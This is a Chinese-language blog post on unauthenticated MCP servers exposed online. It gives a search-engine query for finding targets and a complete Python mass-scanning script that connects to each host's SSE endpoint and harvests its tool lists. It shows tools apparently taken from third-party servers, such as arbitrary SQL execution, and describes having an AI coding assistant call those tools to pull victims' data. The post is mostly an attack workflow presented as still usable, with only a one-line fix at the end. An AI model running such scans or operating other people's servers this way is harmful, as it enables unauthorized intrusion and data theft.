部署在公网的mcp可能存在的一个未授权问题

写在前面

有效期截止到2025年08月24日依然有效,目前还是可以利用用来挖漏洞的状态

MCP(Model Context Protocol)是由Anthropic于2024年11月推出的一种开放标准,旨在解决大型语言模型(LLM)与外部数据源和工具之间的通信问题。其主要目标是打破当前AI模型的数据孤岛限制,从而使AI应用能够更加高效地访问和操作本地及外部的数据源。

MCP的核心目标包括:

  1. 增强数据互通性:使得不同的AI模型能够在不依赖单一系统的情况下,灵活地与外部资源进行交互。
  2. 消除环境依赖:提供一个统一的通信协议,简化模型与外部工具的集成,使得模型在不同的环境中能无缝运行。
  3. 提高效率:减少传统的调用和数据传输方式中的延迟,从而提高系统的整体响应速度和准确性。

可以把它理解为一个”中介协议”,使得AI模型能够在不同的数据平台和工具之间顺利通信,实现更复杂的任务和功能。

MCP已经出来很长一段时间了,市面上出现的大量开源MCP服务是没有鉴权的,即可以直接使用uvicorn部署到公网,那么这就导致一个大问题,也是传统web渗透中特别常见的问题——未授权访问,攻击者可以不经过授权直接去调用这些MCP,操作本地及远程数据本身就存在高危风险,也是会出现漏洞的地方。

MCP支持的通信模式

MCP(模型上下文协议)主要支持以下三种通信模式:

1. STDIO模式(标准输入输出)

STDIO是MCP最常见、互操作性最好的通信模式,也是官方推荐的方式。它使用标准输入/输出流进行通信,特别适用于本地进程。

特点:

  • 通过标准输入输出流传递数据
  • 简单易于实现
  • 适合本地进程间通信
  • 无需网络配置
  • 自然的进程生命周期管理
  • 使用一种简单的消息帧格式,包括Content-Length头和JSON-RPC消息

局限性:

  • 只适用于本地进程
  • 每个服务器仅限一个客户端
  • 没有内置认证机制
  • 可能存在阻塞问题

2. SSE模式(服务器发送事件)

SSE使用HTTP进行客户端到服务器的请求,使用SSE(Server-Sent Events)进行服务器到客户端的消息传递。这种方式适合Web应用程序和远程服务器。根据最新信息,SSE现在被视为已弃用,但仍然被许多工具支持。

特点:

  • 客户端通过HTTP POST请求发送消息
  • 服务器通过SSE事件发送消息回客户端
  • 可以通过标准HTTP工作
  • 支持远程客户端
  • 可以服务多个客户端
  • 与Web基础设施集成

局限性:

  • 实现较为复杂
  • 需要HTTP服务器
  • 连接管理更具挑战性
  • 可能存在防火墙问题

3. Streaming HTTP模式

这是在较新版本的MCP规范中添加的模式,用于替代SSE模式。Streaming HTTP服务器可以”原样”部署。

特点:

  • 使用HTTP长连接进行双向通信
  • 更适合现代Web应用
  • 可能有更好的兼容性和性能
  • 与现代Web标准更加一致

结论

MCP支持三种主要的通信模式:STDIO(标准输入/输出)、SSE(服务器发送事件)和Streaming HTTP。当前的mcp_client.py脚本专注于检测SSE模式的服务器,但可以扩展以支持其他通信模式。STDIO是官方推荐的模式,具有最好的互操作性,而SSE现在被视为已弃用但仍然受到支持。

公网部署MCP服务存在的未授权

以常见的机器学习模型服务通常涉及到将预训练的模型(如 TensorFlow、PyTorch 模型)通过 API 提供服务为例,部署代码为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
"mcpServers": {
"ml_model": {
"command": "uv",
"args": [
"--directory",
"path/to/ml_model_server",
"run",
"ml_model_server"
],
"env": {
"MODEL_PATH": "/path/to/your/model"
}
}
}
}

亦或者是常见的消息队列服务有 RabbitMQKafka的部署,部署代码为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
{
"mcpServers": {
"rabbitmq": {
"command": "uv",
"args": [
"--directory",
"path/to/rabbitmq_mcp_server",
"run",
"rabbitmq_mcp_server"
],
"env": {
"RABBITMQ_HOST": "localhost",
"RABBITMQ_PORT": "5672",
"RABBITMQ_USER": "guest",
"RABBITMQ_PASSWORD": "guest"
}
}
}
}

用户将自己的相关信息RABBITMQ_HOSTRABBITMQ_PORTRABBITMQ_USERRABBITMQ_PASSWORD填入后部署,并且将其放到公网上,那么即可被攻击者获取到

hunter查询uvicorn部署mcp语法:

1
header.server=="uvicorn"&&header.status_code=="404"&&header="text/plain"

如果要使用SSE模式的mcp,直接逐个访问访问/sse 判断是否存在sse模式的MCP,其他模式类似,给出我所使用的批量处理的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
import json
import asyncio
import sys
import csv
import datetime
from typing import Optional
from contextlib import AsyncExitStack

# 避免与已安装的mcp包冲突,使用完整导入路径
import mcp
from mcp import ClientSession, StdioServerParameters
from mcp.client.sse import sse_client

from dotenv import load_dotenv
from openai import AsyncOpenAI, OpenAI
import os

# 从CSV文件中提取URL
def extract_urls_from_csv(csv_file_path):
"""
从CSV文件中提取URL列的数据

参数:
csv_file_path: CSV文件路径

返回:
包含所有有效URL的列表
"""
urls = []
try:
with open(csv_file_path, 'r', encoding='utf-8') as file:
csv_reader = csv.DictReader(file)
for row in csv_reader:
if 'url' in row and row['url']:
url = row['url']
# 确保URL不以/sse结尾,因为我们会在后面添加
if url.endswith('/sse'):
url = url[:-4]
urls.append(url)
return urls
except Exception as e:
print(f"读取CSV文件时出错: {e}")
return []

# 从CSV文件中提取URL
urls = extract_urls_from_csv('assets_2025725.csv') # hunter查询出的数据导出


def save_tools_to_json(url, tools, output_file):
"""
将URL和对应的工具信息保存到JSON文件中

参数:
url: 服务器URL
tools: 工具字典
output_file: 输出文件路径

返回:
成功返回True,失败返回False
"""
try:
# 确保输出目录存在
output_dir = os.path.dirname(output_file)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print(f"创建输出目录: {output_dir}")

# 准备要保存的数据
tools_data = {}
for tool_name, tool in tools.items():
# 安全地获取工具属性
tool_info = {
'name': getattr(tool, 'name', tool_name),
'description': getattr(tool, 'description', '')
}

# 安全地获取参数信息
if hasattr(tool, 'parameters'):
try:
# 尝试将参数转换为可序列化的格式
if isinstance(tool.parameters, dict):
tool_info['parameters'] = tool.parameters
else:
tool_info['parameters'] = str(tool.parameters)
except Exception as e:
print(f"处理工具参数时出错: {e}")
tool_info['parameters'] = str(tool.parameters)

tools_data[tool_name] = tool_info

# 创建包含URL和工具信息的数据结构
data_to_save = {
'url': url,
'tools': tools_data,
'timestamp': datetime.datetime.now().isoformat()
}

# 如果文件已存在,读取现有数据并添加新数据
existing_data = []
try:
if os.path.exists(output_file):
with open(output_file, 'r', encoding='utf-8') as f:
existing_data = json.load(f)
if not isinstance(existing_data, list):
existing_data = [existing_data]
except Exception as e:
print(f"读取现有JSON文件时出错: {e}")
existing_data = []

# 添加新数据并保存
existing_data.append(data_to_save)

# 使用临时文件保存,成功后再重命名,避免写入失败导致文件损坏
temp_file = output_file + '.tmp'
with open(temp_file, 'w', encoding='utf-8') as f:
json.dump(existing_data, f, ensure_ascii=False, indent=2, default=str)

# 重命名临时文件为目标文件
os.replace(temp_file, output_file)

print(f"成功将URL和工具信息保存到 {output_file}")
return True
except Exception as e:
print(f"保存工具信息时出错: {e}")
import traceback
traceback.print_exc()
return False


async def connect_server(base_url, timeout=10):
"""
连接到 MCP 服务器并获取工具列表

参数:
base_url: 服务器URL
timeout: 连接超时时间(秒)

返回:
包含以下键的字典:
- session: ClientSession 对象
- tools: 工具字典 {name: tool}
- exit_stack: ExitStack 对象用于资源管理
"""
url = base_url
print(f"尝试连接到: {url}")

exit_stack = AsyncExitStack()
result = {
'exit_stack': exit_stack,
}

try:
# 使用asyncio.wait_for添加超时处理
async def connect():
# 建立 SSE 连接
sse_cm = sse_client(url)
streams = await exit_stack.enter_async_context(sse_cm)

# 创建会话
session_cm = ClientSession(streams[0], streams[1])
session = await exit_stack.enter_async_context(session_cm)
await session.initialize()
return session, streams

# 添加超时处理
session, streams = await asyncio.wait_for(connect(), timeout=timeout)

# 获取工具列表
response = await session.list_tools()
tools = {tool.name: tool for tool in response.tools}
print(f"成功获取 {len(tools)} 个工具:")
for i in tools:
print(i,tools[i].description.replace("\n","").replace("\r",""))

result['session'] = session
result['tools'] = tools
return result

except asyncio.TimeoutError:
print(f"连接超时: {url}")
await exit_stack.aclose()
raise
except Exception as e:
print(f"连接失败: {url}, 错误: {e}")
await exit_stack.aclose()
raise

async def main():
"""
主函数:从CSV文件中提取URL,连接服务器获取工具信息,并保存到JSON文件
"""
# 去重并打印URL数量
unique_urls = list(set(urls))
print(f"从CSV文件中提取了 {len(urls)} 个URL,去重后剩余 {len(unique_urls)} 个")

# 记录各种状态的URL数量
success_count = 0 # 成功连接的URL数量
saved_count = 0 # 成功保存工具信息的URL数量
timeout_count = 0 # 连接超时的URL数量
error_count = 0 # 其他错误的URL数量

# 创建输出目录(如果不存在)
output_dir = 'tools_data'
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print(f"创建输出目录: {output_dir}")

# 创建带有时间戳的输出文件名
timestamp = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
output_file = os.path.join(output_dir, f'tools_info_{timestamp}.json')
print(f"工具信息将保存到: {output_file}")

# 遍历所有URL
for i, url in enumerate(unique_urls):
print(f"\n[{i+1}/{len(unique_urls)}] 正在尝试连接: {url}")
base_url = url
if not base_url.endswith('/sse'):
base_url += "/sse"

try:
# 设置较短的超时时间,避免长时间等待
result = await connect_server(base_url, timeout=5)
if result and 'tools' in result:
success_count += 1
tools_count = len(result['tools'])
print(f"成功获取 {tools_count} 个工具,尝试保存...")

# 保存工具信息
try:
if save_tools_to_json(url, result['tools'], output_file):
saved_count += 1
print(f"✅ 成功保存 {url}{tools_count} 个工具信息")
else:
print(f"❌ 保存 {url} 的工具信息失败")
except Exception as e:
print(f"❌ 保存工具信息时出错: {e}")
import traceback
traceback.print_exc()

# 关闭连接
try:
if 'session' in result:
await result['session'].close()
if 'exit_stack' in result:
await result['exit_stack'].aclose()
except Exception as e:
print(f"关闭连接时出错: {e}")
else:
print(f"❌ 连接成功但未获取到工具信息")
error_count += 1

except asyncio.TimeoutError:
print(f"⏱️ 连接超时: {base_url}")
timeout_count += 1
except Exception as e:
print(f"❌ 连接失败: {e}")
error_count += 1

# 打印总结信息
print(f"\n===== 扫描完成 =====")
print(f"总共尝试连接: {len(unique_urls)} 个URL")
print(f"成功连接并获取工具: {success_count} 个")
print(f"成功保存工具信息: {saved_count} 个")
print(f"连接超时: {timeout_count} 个")
print(f"其他错误: {error_count} 个")
print(f"工具信息已保存到: {output_file}")

# 如果没有成功保存任何工具信息,检查输出文件是否存在
if saved_count == 0:
if os.path.exists(output_file):
print(f"警告: 输出文件存在但未记录成功保存,请检查文件内容")
else:
print(f"警告: 未成功保存任何工具信息,输出文件不存在")

if __name__ == "__main__":
asyncio.run(main())

部分结果如下,ip地址

写到这里各位大概也已经初步了解此类漏洞该去如何利用了,以此延伸出来的漏洞有RCE、数据泄露、SSRF等漏洞,最简单的漏洞应该就是信息泄露,直接调用mcp去查询即可未授权获取受害者服务器信息

1
2
3
4
5
execute_mysql_query     执行给定的 SQL 查询语句并返回结果或错误信息。    Args:        sql_query (str): 由 LLM 生成的 SQL 查询语句。        max_rows (int): 对于 SELECT 查询,限制返回的最大行数,防止结果过大。    Returns:        str: 格式化后的查询结果字符串或错误信息字符串。             对于 SELECT,返回表头和数据行。             对于 INSERT/UPDATE/DELETE,返回影响的行数。             对于错误,返回具体的错误信息。    
list_tables 获取当前数据库中所有表的列表。 内部调用 execute_mysql_query 执行 'SHOW TABLES;'
get_table_schema 获取指定数据表的结构(列信息)。 内部调用 execute_mysql_query 执行 'DESCRIBE table_name;'。 Args: table_name (str): 需要查询结构的数据表名称。 Returns: str: 表结构的格式化字符串或错误信息。
query_dify_alerts
query_ne_parameters 根据指定的设备名称获取设备的参数信息。 调用指定的 API 接口获取参数信息,使用 HTTP POST 请求。 Args: StationInfoRequest (dict): 查询参数对象,包含设备名称列表 Returns: dict: 包含设备参数信息的结构化数据或错误信息。

我们根据获取到的直接去cursor或者trae中调用mcp

1
2
3
4
5
6
7
{
"mcpServers": {
"test": {
"url": "http://xxxxxx:xxx/sse"
}
}
}

获取到了我们上面脚本跑出来的五个工具

然后直接ai去调用即可

用我自己放到公网的mcp测试如下,危害大家就一目了然了

自查及修复

mcp服务不要放到公网上,以及如果要放到公网上设置白名单


部署在公网的mcp可能存在的一个未授权问题
http://example.com/2025/08/24/部署在公网的mcp可能存在的一个未授权/
作者
Winter
发布于
2025年8月24日
许可协议